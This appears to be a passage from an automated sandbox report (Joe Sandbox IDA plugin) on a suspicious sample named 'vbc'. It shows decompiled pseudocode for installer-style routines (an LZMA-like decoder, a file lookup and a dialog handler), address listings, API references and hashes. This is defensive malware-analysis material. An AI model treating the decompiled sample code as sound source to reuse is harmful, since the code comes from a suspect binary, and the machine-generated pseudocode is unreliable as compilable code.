								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}

0x00000000
0x004068da
0x004068da
0x004068df
0x00406956
0x0040695d
0x00406967
0x00406f46
0x00406f46
0x00406f49
0x00406f49
0x00406f4f
0x00406f55
0x00406f5b
0x00406f75
0x00406f78
0x00406f7e
0x00406f89
0x00406f8b
0x00406f5d
0x00406f5d
0x00406f6c
0x00406f70
0x00406f70
0x00406f95
0x00406fbc
0x00406fbc
0x00406fc2
0x00406fc2
0x00000000
0x00406f97
0x00406f97
0x00406f9b
0x0040714a
0x00000000
0x0040714a
0x00406fa7
0x00406fae
0x00406fb6
0x00406fb9
0x00000000
0x00406fb9
0x004068e1
0x004068e1
0x004068e5
0x004068ed
0x004068f0
0x004068f2
0x004068f5
0x004068f7
0x004068fc
0x004068ff
0x00406906
0x0040690d
0x00406910
0x0040691b
0x00406923
0x00406923
0x0040691d
0x0040691d
0x0040691d
0x00406912
0x00406912
0x00406912
0x0040692a
0x00406948
0x0040694a
0x00406b1d
0x00406b1d
0x00406b20
0x00406b23
0x00406b26
0x00406b29
0x00406b2c
0x00406b2f
0x00406b32
0x00406b35
0x00406b3b
0x00406b53
0x00406b56
0x00406b59
0x00406b5c
0x00406b5c
0x00406b5f
0x00406b65
0x00406b3d
0x00406b3d
0x00406b45
0x00406b4a
0x00406b4c
0x00406b4e
0x00406b4e
0x00406b6f
0x00406b72
0x00406b15
0x00406b1b
0x00000000
0x00000000
0x00000000
0x00406b74
0x00406af0
0x00406af4
0x004070fc
0x00000000
0x004070fc
0x00406afa
0x00406afd
0x00406b00
0x00406b04
0x00406b07
0x00406b0d
0x00406b0f
0x00406b0f
0x00406b12
0x00000000
0x00406b12
0x0040692c
0x0040692c
0x0040692f
0x00406935
0x00406937
0x00406937
0x0040693a
0x0040693d
0x0040693f
0x00406940
0x00406943
0x004069b0
0x004069b0
0x004069b4
0x004069b7
0x004069ba
0x004069bd
0x004069c0
0x004069c1
0x004069c4
0x004069c6
0x004069cc
0x004069cf
0x004069d2
0x004069d5
0x004069d8
0x004069de
0x004069fa
0x004069fd
0x00406a00
0x00406a03
0x00406a0a
0x00406a10
0x00406a14
0x004069e0
0x004069e0
0x004069e4
0x004069ec
0x004069f1
0x004069f3
0x004069f5
0x004069f5
0x00406a1e
0x00406a21
0x00406998
0x00406998
0x0040699e
0x00406a51
0x00406a57
0x00000000
0x00000000
0x00406a59
0x00406a5c
0x00406a5f
0x00406a62
0x00406a65
0x00406a68
0x00406a6b
0x00406a6e
0x00406a71
0x00406a77
0x00406a8f
0x00406a92
0x00406a95
0x00406a98
0x00406a98
0x00406a9b
0x00406aa1
0x00406a79
0x00406a79
0x00406a81
0x00406a86
0x00406a88
0x00406a8a
0x00406a8a
0x00406aab
0x00406aae
0x00406a2c
0x00406a30
0x004070f0
0x00000000
0x004070f0
0x00406a36
0x00406a39
0x00406a3c
0x00406a40
0x00406a43
0x00406a49
0x00406a4b
0x00406a4b
0x00406a4e
0x00406a4e
0x00406aae
0x00406ab5
0x00406ab5
0x00406ab5
0x00406ab9
0x00406ab9
0x00406abc
0x00406abf
0x00406ac3
0x00407108
0x00000000
0x00407108
0x00406ac9
0x00406acc
0x00406acf
0x00406ad2
0x00406ad5
0x00406ad8
0x00406adb
0x00406add
0x00406ae0
0x00406ae3
0x00406ae6
0x00406ae8
0x00406ae8
0x00406ae8
0x00406c85
0x00406c85
0x00406c88
0x00406c88
0x00000000
0x00406c88
0x004069aa
0x00000000
0x00000000
0x00000000
0x00406a27
0x00406973
0x00406977
0x004070e4
0x00407160
0x00407168
0x0040716f
0x00407171
0x00407178
0x0040717c
0x0040717c
0x0040697d
0x00406980
0x00406983
0x00406987
0x0040698a
0x00406990
0x00406992
0x00406992
0x00406995
0x00000000
0x00406995
0x00406a21
0x0040692a
0x0040675e
0x0040675e
0x00406767
0x00407175
0x00407175
0x00000000
0x00407175
0x0040676d
0x00000000
0x00406778
0x00000000
0x00000000
0x00406781
0x00406784
0x00406787
0x0040678b
0x00000000
0x00000000
0x00406791
0x00406794
0x00406796
0x00406797
0x0040679a
0x0040679c
0x0040679d
0x0040679f
0x004067a2
0x004067a7
0x004067ac
0x004067b5
0x004067c8
0x004067cb
0x004067d7
0x004067ff
0x00406801
0x0040680f
0x0040680f
0x00406813
0x00000000
0x00000000
0x00000000
0x00000000
0x00406803
0x00406803
0x00406806
0x00406807
0x00406807
0x00000000
0x00406803
0x004067dd
0x004067e2
0x004067e2
0x004067eb
0x004067f3
0x004067f6
0x00000000
0x004067fc
0x004067fc
0x00000000
0x004067fc
0x00000000
0x00406819
0x00406819
0x0040681d
0x004070c9
0x00000000
0x004070c9
0x00406826
0x00406836
0x00406839
0x0040683c
0x0040683c
0x0040683c
0x0040683f
0x00406843
0x00000000
0x00000000
0x00406845
0x0040684b
0x00406875
0x0040687b
0x00406882
0x00000000
0x00406882
0x00406851
0x00406854
0x00406859
0x00406859
0x00406864
0x0040686c
0x0040686f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004068b4
0x004068ba
0x004068bd
0x004068ca
0x004068d2
0x00000000
0x00000000
0x00406889
0x00406889
0x0040688d
0x004070d8
0x00000000
0x004070d8
0x00406899
0x004068a4
0x004068a4
0x004068a4
0x004068a7
0x004068aa
0x004068ad
0x004068b2
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406b79
0x00406b7d
0x00406b9b
0x00406b9e
0x00406ba5
0x00406ba8
0x00406bab
0x00406bae
0x00406bb1
0x00406bb4
0x00406bb6
0x00406bbd
0x00406bbe
0x00406bc0
0x00406bc3
0x00406bc6
0x00406bc9
0x00406bc9
0x00406bce
0x00000000
0x00406bce
0x00406b7f
0x00406b82
0x00406b85
0x00406b8f
0x00000000
0x00000000
0x00406be3
0x00406be7
0x00406c0a
0x00406c0d
0x00406c10
0x00406c1a
0x00406be9
0x00406be9
0x00406bec
0x00406bef
0x00406bf2
0x00406bff
0x00406c02
0x00406c02
0x00000000
0x00000000
0x00406c26
0x00406c2a
0x00000000
0x00000000
0x00406c30
0x00406c34
0x00000000
0x00000000
0x00406c3a
0x00406c3c
0x00406c40
0x00406c40
0x00406c43
0x00406c47
0x00000000
0x00000000
0x00406c97
0x00406c9b
0x00406ca2
0x00406ca5
0x00406ca8
0x00406cb2
0x00000000
0x00406cb2
0x00406c9d
0x00000000
0x00000000
0x00406cbe
0x00406cc2
0x00406cc9
0x00406ccc
0x00406ccf
0x00406cc4
0x00406cc4
0x00406cc4
0x00406cd2
0x00406cd5
0x00406cd8
0x00406cd8
0x00406cdb
0x00406cde
0x00406ce1
0x00406ce1
0x00406ce4
0x00406ceb
0x00406cf0
0x00000000
0x00000000
0x00406d7e
0x00406d7e
0x00406d82
0x00407120
0x00000000
0x00407120
0x00406d88
0x00406d8b
0x00406d8e
0x00406d92
0x00406d95
0x00406d9b
0x00406d9d
0x00406d9d
0x00406d9d
0x00406da0
0x00406da3
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406e01
0x00406e01
0x00406e05
0x0040712c
0x00000000
0x0040712c
0x00406e0b
0x00406e0e
0x00406e11
0x00406e15
0x00406e18
0x00406e1e
0x00406e20
0x00406e20
0x00406e20
0x00406e23
0x00000000
0x00000000
0x00406bd1
0x00406bd1
0x00406bd4
0x00000000
0x00000000
0x00406f10
0x00406f14
0x00406f36
0x00406f39
0x00406f43
0x00000000
0x00406f43
0x00406f16
0x00406f19
0x00406f1d
0x00406f20
0x00406f20
0x00406f23
0x00000000
0x00000000
0x00406fcd
0x00406fd1
0x00406fef
0x00406fef
0x00406fef
0x00406ff6
0x00406ffd
0x00407004
0x00407004
0x00000000
0x00407004
0x00406fd3
0x00406fd6
0x00406fd9
0x00406fdc
0x00406fe3
0x00406f27
0x00406f27
0x00406f2a
0x00000000
0x00000000
0x004070be
0x004070c1
0x00000000
0x00000000
0x00406cf8
0x00406cfa
0x00406d01
0x00406d02
0x00406d04
0x00406d07
0x00000000
0x00000000
0x00406d0f
0x00406d12
0x00406d15
0x00406d17
0x00406d19
0x00406d19
0x00406d1a
0x00406d1d
0x00406d24
0x00406d27
0x00406d35
0x00000000
0x00000000
0x0040700b
0x0040700b
0x0040700e
0x00407015
0x00000000
0x00000000
0x0040701a
0x0040701a
0x0040701e
0x00407156
0x00000000
0x00407156
0x00407024
0x00407027
0x0040702a
0x0040702e
0x00407031
0x00407037
0x00407039
0x00407039
0x00407039
0x0040703c
0x0040703f
0x0040703f
0x0040703f
0x0040703f
0x00407042
0x00407042
0x00407046
0x004070a6
0x004070a9
0x004070ae
0x004070af
0x004070b1
0x004070b3
0x004070b6
0x00000000
0x004070b6
0x00407048
0x0040704e
0x00407051
0x00407054
0x00407057
0x0040705a
0x0040705d
0x00407060
0x00407063
0x00407066
0x00407069
0x00407082
0x00407085
0x00407088
0x0040708b
0x0040708f
0x00407091
0x00407091
0x00407092
0x00407095
0x0040706b
0x0040706b
0x00407073
0x00407078
0x0040707a
0x0040707d
0x0040707d
0x00407098
0x0040709f
0x00000000
0x004070a1
0x00000000
0x004070a1
0x00000000
0x00406d3d
0x00406d40
0x00406d76
0x00406ea6
0x00406ea6
0x00406ea6
0x00406ea6
0x00406ea9
0x00406ea9
0x00406eac
0x00406eae
0x00407138
0x00000000
0x00407138
0x00406eb4
0x00406eb7
0x00000000
0x00000000
0x00406ebd
0x00406ec1
0x00406ec4
0x00406ec4
0x00406ec4
0x00000000
0x00406ec4
0x00406d42
0x00406d44
0x00406d46
0x00406d48
0x00406d4b
0x00406d4c
0x00406d4e
0x00406d50
0x00406d53
0x00406d56
0x00406d6c
0x00406d71
0x00406da9
0x00406da9
0x00406dad
0x00406dd9
0x00406ddb
0x00406de2
0x00406de5
0x00406de8
0x00406de8
0x00406ded
0x00406ded
0x00406def
0x00406df2
0x00406df9
0x00406dfc
0x00406e29
0x00406e29
0x00406e2c
0x00406e2f
0x00406ea3
0x00406ea3
0x00406ea3
0x00000000
0x00406ea3
0x00406e31
0x00406e37
0x00406e3a
0x00406e3d
0x00406e40
0x00406e43
0x00406e46
0x00406e49
0x00406e4c
0x00406e4f
0x00406e52
0x00406e6b
0x00406e6d
0x00406e70
0x00406e71
0x00406e74
0x00406e76
0x00406e79
0x00406e7b
0x00406e7d
0x00406e80
0x00406e82
0x00406e85
0x00406e89
0x00406e8b
0x00406e8b
0x00406e8c
0x00406e8f
0x00406e92
0x00406e54
0x00406e54
0x00406e5c
0x00406e61
0x00406e63
0x00406e66
0x00406e66
0x00406e95
0x00406e9c
0x00406e26
0x00406e26
0x00406e26
0x00406e26
0x00000000
0x00406e9e
0x00000000
0x00406e9e
0x00406e9c
0x00406daf
0x00406db2
0x00406db4
0x00406db7
0x00406dba
0x00406dbd
0x00406dbf
0x00406dc2
0x00406dc5
0x00406dc5
0x00406dc8
0x00406dc8
0x00406dcb
0x00406dd2
0x00406da6
0x00406da6
0x00406da6
0x00406da6
0x00000000
0x00406dd4
0x00000000
0x00406dd4
0x00406dd2
0x00406d58
0x00406d5b
0x00406d5d
0x00406d60
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c4a
0x00406c4a
0x00406c4e
0x00407114
0x00000000
0x00407114
0x00406c54
0x00406c57
0x00406c5a
0x00406c5d
0x00406c5f
0x00406c5f
0x00406c5f
0x00406c62
0x00406c65
0x00406c68
0x00406c6b
0x00406c6e
0x00406c71
0x00406c72
0x00406c74
0x00406c74
0x00406c74
0x00406c77
0x00406c7a
0x00406c7d
0x00406c80
0x00406c80
0x00406c80
0x00406c83
0x00000000
0x00000000
0x00406ec7
0x00406ec7
0x00406ec7
0x00406ecb
0x00000000
0x00000000
0x00406ed1
0x00406ed4
0x00406ed7
0x00406eda
0x00406edc
0x00406edc
0x00406edc
0x00406edf
0x00406ee2
0x00406ee5
0x00406ee8
0x00406eeb
0x00406eee
0x00406eef
0x00406ef1
0x00406ef1
0x00406ef1
0x00406ef4
0x00406ef7
0x00406efa
0x00406efd
0x00406f00
0x00406f04
0x00406f06
0x00406f09
0x00000000
0x00406f0b
0x00000000
0x00406f0b
0x00406f09
0x0040713e
0x00000000
0x00000000
0x0040676d

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c82c24978351f7c13972ed02e311308c491194f519d2ef9506af47d33a0889c0
Instruction ID: a9eeadc94889c10b02ffd6b9c25b4bb5d01c95f6ce45251ce11bee8d9ce53b4a
Opcode Fuzzy Hash: c82c24978351f7c13972ed02e311308c491194f519d2ef9506af47d33a0889c0
Instruction Fuzzy Hash: BFF18671D04229CBCF28CFA8C8946ADBBB1FF45305F25816ED856BB281C7785A86CF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406555 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406555(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x426778); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x426778;
			}

0x00406560
0x00406569
0x00000000
0x00406576
0x0040656c
0x00000000

APIs

FindFirstFileW.KERNELBASE(7556D4C4,00426778,00425F30,00405D17,00425F30,00425F30,00000000,00425F30,00425F30,7556D4C4,?,755513E0,00405A23,?,7556D4C4,755513E0), ref: 00406560
FindClose.KERNEL32(00000000), ref: 0040656C

Strings

xgB, xrefs: 00406556

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: xgB
API String ID: 2295610775-399326502
Opcode ID: 4403a27f78f835125bd15cd158b53f866fd18ebbb8f54cd400289453990cbd04
Instruction ID: a17ed3a5ae88bd5f55df5b749dd223de66f1ff534e9406d7b6838b5a0b6fdea6
Opcode Fuzzy Hash: 4403a27f78f835125bd15cd158b53f866fd18ebbb8f54cd400289453990cbd04
Instruction Fuzzy Hash: 6FD01231904530ABC3111778BE0CC5B7A689F553717628F36F466F12F4C7348C22869C

Uniqueness

Uniqueness Score: -1.00%

Function 00403DFE Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E00403DFE(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t37;
				signed int _t39;
				signed int _t41;
				struct HWND__* _t51;
				signed int _t69;
				struct HWND__* _t75;
				signed int _t88;
				struct HWND__* _t93;
				signed int _t101;
				int _t105;
				signed int _t117;
				signed int _t118;
				int _t119;
				signed int _t124;
				struct HWND__* _t127;
				struct HWND__* _t128;
				int _t129;
				long _t132;
				int _t134;
				int _t135;
				void* _t136;

				_t117 = _a8;
				if(_t117 == 0x110 || _t117 == 0x408) {
					_t37 = _a12;
					_t127 = _a4;
					__eflags = _t117 - 0x110;
					 *0x423710 = _t37;
					if(_t117 == 0x110) {
						 *0x42a248 = _t127;
						 *0x423724 = GetDlgItem(_t127, 1);
						_t93 = GetDlgItem(_t127, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x4216f0 = _t93;
						E004042D6(_t127);
						SetClassLongW(_t127, 0xfffffff2,  *0x429228);
						 *0x42920c = E0040140B(4);
						_t37 = 1;
						__eflags = 1;
						 *0x423710 = 1;
					}
					_t124 =  *0x40a39c; // 0x0
					_t135 = 0;
					_t132 = (_t124 << 6) +  *0x42a260;
					__eflags = _t124;
					if(_t124 < 0) {
						L34:
						E00404322(0x40b);
						while(1) {
							_t39 =  *0x423710;
							 *0x40a39c =  *0x40a39c + _t39;
							_t132 = _t132 + (_t39 << 6);
							_t41 =  *0x40a39c; // 0x0
							__eflags = _t41 -  *0x42a264;
							if(_t41 ==  *0x42a264) {
								E0040140B(1);
							}
							__eflags =  *0x42920c - _t135;
							if( *0x42920c != _t135) {
								break;
							}
							__eflags =  *0x40a39c -  *0x42a264; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t118 =  *(_t132 + 0x14);
							E00406234(_t118, _t127, _t132, 0x43a000,  *((intOrPtr*)(_t132 + 0x24)));
							_push( *((intOrPtr*)(_t132 + 0x20)));
							_push(0xfffffc19);
							E004042D6(_t127);
							_push( *((intOrPtr*)(_t132 + 0x1c)));
							_push(0xfffffc1b);
							E004042D6(_t127);
							_push( *((intOrPtr*)(_t132 + 0x28)));
							_push(0xfffffc1a);
							E004042D6(_t127);
							_t51 = GetDlgItem(_t127, 3);
							__eflags =  *0x42a2cc - _t135;
							_v32 = _t51;
							if( *0x42a2cc != _t135) {
								_t118 = _t118 & 0x0000fefd | 0x00000004;
								__eflags = _t118;
							}
							ShowWindow(_t51, _t118 & 0x00000008); // executed
							EnableWindow( *(_t136 + 0x30), _t118 & 0x00000100); // executed
							E004042F8(_t118 & 0x00000002);
							_t119 = _t118 & 0x00000004;
							EnableWindow( *0x4216f0, _t119);
							__eflags = _t119 - _t135;
							if(_t119 == _t135) {
								_push(1);
							} else {
								_push(_t135);
							}
							EnableMenuItem(GetSystemMenu(_t127, _t135), 0xf060, ??);
							SendMessageW( *(_t136 + 0x38), 0xf4, _t135, 1);
							__eflags =  *0x42a2cc - _t135;
							if( *0x42a2cc == _t135) {
								_push( *0x423724);
							} else {
								SendMessageW(_t127, 0x401, 2, _t135);
								_push( *0x4216f0);
							}
							E0040430B();
							E00406212(0x423728, 0x429240);
							E00406234(0x423728, _t127, _t132,  &(0x423728[lstrlenW(0x423728)]),  *((intOrPtr*)(_t132 + 0x18)));
							SetWindowTextW(_t127, 0x423728); // executed
							_push(_t135);
							_t69 = E00401389( *((intOrPtr*)(_t132 + 8)));
							__eflags = _t69;
							if(_t69 != 0) {
								continue;
							} else {
								__eflags =  *_t132 - _t135;
								if( *_t132 == _t135) {
									continue;
								}
								__eflags =  *(_t132 + 4) - 5;
								if( *(_t132 + 4) != 5) {
									DestroyWindow( *0x429218); // executed
									 *0x422700 = _t132;
									__eflags =  *_t132 - _t135;
									if( *_t132 <= _t135) {
										goto L58;
									}
									_t75 = CreateDialogParamW( *0x42a240,  *_t132 +  *0x429220 & 0x0000ffff, _t127,  *( *(_t132 + 4) * 4 + "sD@"), _t132); // executed
									__eflags = _t75 - _t135;
									 *0x429218 = _t75;
									if(_t75 == _t135) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t132 + 0x2c)));
									_push(6);
									E004042D6(_t75);
									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t136 + 0x10);
									ScreenToClient(_t127, _t136 + 0x10);
									SetWindowPos( *0x429218, _t135,  *(_t136 + 0x20),  *(_t136 + 0x20), _t135, _t135, 0x15);
									_push(_t135);
									E00401389( *((intOrPtr*)(_t132 + 0xc)));
									__eflags =  *0x42920c - _t135;
									if( *0x42920c != _t135) {
										goto L61;
									}
									ShowWindow( *0x429218, 8);
									E00404322(0x405);
									goto L58;
								}
								__eflags =  *0x42a2cc - _t135;
								if( *0x42a2cc != _t135) {
									goto L61;
								}
								__eflags =  *0x42a2c0 - _t135;
								if( *0x42a2c0 != _t135) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x429218);
						 *0x42a248 = _t135;
						EndDialog(_t127,  *0x421ef8);
						goto L58;
					} else {
						__eflags = _t37 - 1;
						if(_t37 != 1) {
							L33:
							__eflags =  *_t132 - _t135;
							if( *_t132 == _t135) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t88 = E00401389( *((intOrPtr*)(_t132 + 0x10)));
						__eflags = _t88;
						if(_t88 == 0) {
							goto L33;
						}
						SendMessageW( *0x429218, 0x40f, 0, 1);
						__eflags =  *0x42920c;
						return 0 |  *0x42920c == 0x00000000;
					}
				} else {
					_t127 = _a4;
					_t135 = 0;
					if(_t117 == 0x47) {
						SetWindowPos( *0x423708, _t127, 0, 0, 0, 0, 0x13);
					}
					if(_t117 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x423708,  ~(_a12 - 1) & _t117); // executed
					}
					if(_t117 != 0x40d) {
						__eflags = _t117 - 0x11;
						if(_t117 != 0x11) {
							__eflags = _t117 - 0x111;
							if(_t117 != 0x111) {
								L26:
								return E0040433D(_t117, _a12, _a16);
							}
							_t134 = _a12 & 0x0000ffff;
							_t128 = GetDlgItem(_t127, _t134);
							__eflags = _t128 - _t135;
							if(_t128 == _t135) {
								L13:
								__eflags = _t134 - 1;
								if(_t134 != 1) {
									__eflags = _t134 - 3;
									if(_t134 != 3) {
										_t129 = 2;
										__eflags = _t134 - _t129;
										if(_t134 != _t129) {
											L25:
											SendMessageW( *0x429218, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x42a2cc - _t135;
										if( *0x42a2cc == _t135) {
											_t101 = E0040140B(3);
											__eflags = _t101;
											if(_t101 != 0) {
												goto L26;
											}
											 *0x421ef8 = 1;
											L21:
											_push(0x78);
											L22:
